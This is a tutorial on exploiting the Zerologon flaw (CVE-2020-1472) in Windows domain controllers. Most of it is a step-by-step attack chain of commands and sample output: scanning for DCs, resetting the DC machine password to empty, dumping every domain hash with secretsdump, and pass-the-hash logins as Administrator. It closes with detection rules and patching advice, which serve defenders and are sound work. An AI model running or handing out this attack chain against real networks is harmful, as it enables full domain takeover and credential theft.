Exploiting Zerologon Vulnerability (CVE-2020-1472)

Overview

Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).

Prerequisites

• Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
• No authentication required (unauthenticated exploit)
• Target DC must not have the February 2021 enforcement mode enabled
• Impacket toolkit installed
• Written authorization for red team engagement

MITRE ATT&CK Mapping

Technique ID	Name	Tactic
T1068	Exploitation for Privilege Escalation	Privilege Escalation
T1210	Exploitation of Remote Services	Lateral Movement
T1003.006	OS Credential Dumping: DCSync	Credential Access
T1078.002	Valid Accounts: Domain Accounts	Persistence

Vulnerability Technical Details

Root Cause

The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:

1. The IV is hardcoded to 16 bytes of zeros
2. When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
3. An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed

Affected Systems

• Windows Server 2008 R2 through Windows Server 2019
• All domain controllers running unpatched Netlogon service
• Samba versions < 4.8 (if running as AD DC)

Step 1: Identify Vulnerable Domain Controllers

# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24

# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1

# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon

Step 2: Exploit Zerologon

# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1

# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty string

Step 3: DCSync with Empty Password

# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1

# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::

# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
  -just-dc-user Administrator

Step 4: Obtain Domain Admin Access

# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

Step 5: Restore Machine Account Password (CRITICAL)

WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.

# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
  -hexpass <original_hex_password>

# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*

# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtime

Detection

Windows Event Logs

Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period

Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt

Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP

Network Detection

# Suricata rule for Zerologon
alert dcerpc any any -> any any (
  msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";
  flow:established,to_server;
  dce_opnum:4;
  content:"|00 00 00 00 00 00 00 00|";
  sid:2030870;
  rev:1;
)

Sigma Rule

title: Zerologon Exploitation Attempt
status: stable
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 5805
        LogonType: 3
    timeframe: 5m
    condition: selection | count(EventID) > 100
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068
    - cve.2020.1472

Defensive Recommendations

1. Apply patches immediately - KB4571694 (August 2020) and enforce February 2021 mode
2. Enable enforcement mode via registry: FullSecureChannelProtection = 1
3. Monitor Event ID 5805 for repeated Netlogon failures
4. Deploy Microsoft Defender for Identity (detects Zerologon automatically)
5. Network segmentation - Restrict direct access to DCs from user networks
6. Block Netlogon RPC from non-DC systems where possible

References

• CVE-2020-1472: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472
• Secura Whitepaper: https://www.secura.com/blog/zero-logon
• CrowdStrike Advisory: https://www.crowdstrike.com/blog/cve-2020-1472-zerologon-security-advisory/
• CISA Alert AA20-283A: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
• Microsoft Enforcement: https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73f3a1f24